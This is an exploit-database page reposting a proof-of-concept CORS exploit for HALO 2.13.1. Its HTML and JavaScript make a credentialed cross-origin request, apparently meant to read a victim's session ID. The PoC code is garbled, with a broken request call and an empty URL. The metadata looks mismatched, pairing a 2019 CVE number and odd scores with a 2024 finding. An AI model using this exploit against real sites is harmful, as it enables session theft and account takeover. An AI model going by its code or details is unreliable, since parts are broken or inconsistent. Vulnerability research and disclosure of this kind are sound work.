HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted

CVE Category Price Severity
CVE-2019-7164 CWE-201 $15,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2024-03-16
CVSS:4.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.8344 0.9546

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted
## Title: HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted
## Author: nu11secur1ty
## Date: 03/15/2024
## Vendor:
## Software:
## Reference:

## Description:
The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.
The application allowed access from the requested origin null
The application allows two-way interaction from the null origin. This effectively means that any domain can perform two-way interaction by causing the browser to submit the null origin, for example by issuing the request from a sandboxed iframe or malicious fishing domain with a specially crafted HTML exploit.

STATUS: HIGH- Vulnerability

<h2>CORS POC Exploit
<h3>Extract SID

<div id="demo">
<button type="button" onclick="cors()">Exploit Click here

function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML = alert(this.responseText);
};"GET", "", true);
xhttp.withCredentials = true;



## Reproduce:

## Proof and Exploit:

## Time spent:

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at and
0day Exploit DataBase
home page:
                          nu11secur1ty <>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum